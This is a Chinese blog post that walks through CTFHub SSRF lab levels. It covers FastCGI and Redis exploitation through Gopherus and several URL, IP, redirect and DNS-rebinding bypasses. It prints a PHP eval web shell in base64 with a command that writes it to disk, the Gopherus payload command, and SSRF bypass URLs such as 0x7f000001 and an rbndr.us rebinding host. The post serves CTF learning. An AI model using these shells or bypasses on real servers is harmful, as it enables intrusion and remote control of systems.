ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)

2024-08-29 20:28

本文主要是介绍ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

less-6  FastCGI协议

步骤一:开启环境,查看提示

步骤二:对一句话木马进行base64编码:<?php @eval($_POST[cmd]);?>

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php

步骤三:利用kali,使用Gopherus工具生成payload:

python2 '/home/kali/Desktop/Gopherus/gopherus.py' --exploit fastcgi

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php

步骤四:对所生成进行url编码

步骤五:添加到?url=

访问木马程序

步骤六:利用中国菜刀进行连接

找寻flag

显示提交成功

less-7  Redis协议

步骤一:开启环境,查看提示

步骤三:利用kali,使用Gopherus工具生成payload:

利用url进行编码

添加?url=

访问shell.php

利用中国菜刀进行连接

找到flag

显示提交成功

less-8  URL Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

url=http://notfound.ctfhub.com@127.0.0.1/flag.php

显示提交成功

less-9  数字IP Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

进行进制转换,.换成0

输入:url=http://0x7f000001/flag.php

显示提交成功

less-10  302跳转 Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

url=localhost/flag.php

显示提交成功

less-11  DNS重绑定 Bypass

步骤一:开启环境,查看提示

打开题目附件

rbndr.us dns rebinding service (cmpxchg8b.com)

url=http://7f000001.7f000002.rbndr.us/flag.php

显示提交成功

这篇关于ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1118810

相关文章

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

CentOS 7部署主域名服务器 DNS的方法

《CentOS7部署主域名服务器DNS的方法》文章详细介绍了在CentOS7上部署主域名服务器DNS的步骤,包括安装BIND服务、配置DNS服务、添加域名区域、创建区域文件、配置反向解析、检查配置... 目录1. 安装 BIND 服务和工具2.  配置 BIND 服务3 . 添加你的域名区域配置4.创建区域

Linux系统之dns域名解析全过程

《Linux系统之dns域名解析全过程》:本文主要介绍Linux系统之dns域名解析全过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、dns域名解析介绍1、DNS核心概念1.1 区域 zone1.2 记录 record二、DNS服务的配置1、正向解析的配置

基于@RequestParam注解之Spring MVC参数绑定的利器

《基于@RequestParam注解之SpringMVC参数绑定的利器》:本文主要介绍基于@RequestParam注解之SpringMVC参数绑定的利器,具有很好的参考价值,希望对大家有所帮助... 目录@RequestParam注解:Spring MVC参数绑定的利器什么是@RequestParam?@

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re

Qt 中集成mqtt协议的使用方法

《Qt中集成mqtt协议的使用方法》文章介绍了如何在工程中引入qmqtt库,并通过声明一个单例类来暴露订阅到的主题数据,本文通过实例代码给大家介绍的非常详细,感兴趣的朋友一起看看吧... 目录一,引入qmqtt 库二,使用一,引入qmqtt 库我是将整个头文件/源文件都添加到了工程中进行编译,这样 跨平台

解决JavaWeb-file.isDirectory()遇到的坑问题

《解决JavaWeb-file.isDirectory()遇到的坑问题》JavaWeb开发中,使用`file.isDirectory()`判断路径是否为文件夹时,需要特别注意:该方法只能判断已存在的文... 目录Jahttp://www.chinasem.cnvaWeb-file.isDirectory()遇

JavaWeb-WebSocket浏览器服务器双向通信方式

《JavaWeb-WebSocket浏览器服务器双向通信方式》文章介绍了WebSocket协议的工作原理和应用场景,包括与HTTP的对比,接着,详细介绍了如何在Java中使用WebSocket,包括配... 目录一、概述二、入门2.1 POM依赖2.2 编写配置类2.3 编写WebSocket服务2.4 浏

Spring常见错误之Web嵌套对象校验失效解决办法

《Spring常见错误之Web嵌套对象校验失效解决办法》:本文主要介绍Spring常见错误之Web嵌套对象校验失效解决的相关资料,通过在Phone对象上添加@Valid注解,问题得以解决,需要的朋... 目录问题复现案例解析问题修正总结  问题复现当开发一个学籍管理系统时,我们会提供了一个 API 接口去

VUE动态绑定class类的三种常用方式及适用场景详解

《VUE动态绑定class类的三种常用方式及适用场景详解》文章介绍了在实际开发中动态绑定class的三种常见情况及其解决方案,包括根据不同的返回值渲染不同的class样式、给模块添加基础样式以及根据设... 目录前言1.动态选择class样式(对象添加:情景一)2.动态添加一个class样式(字符串添加:情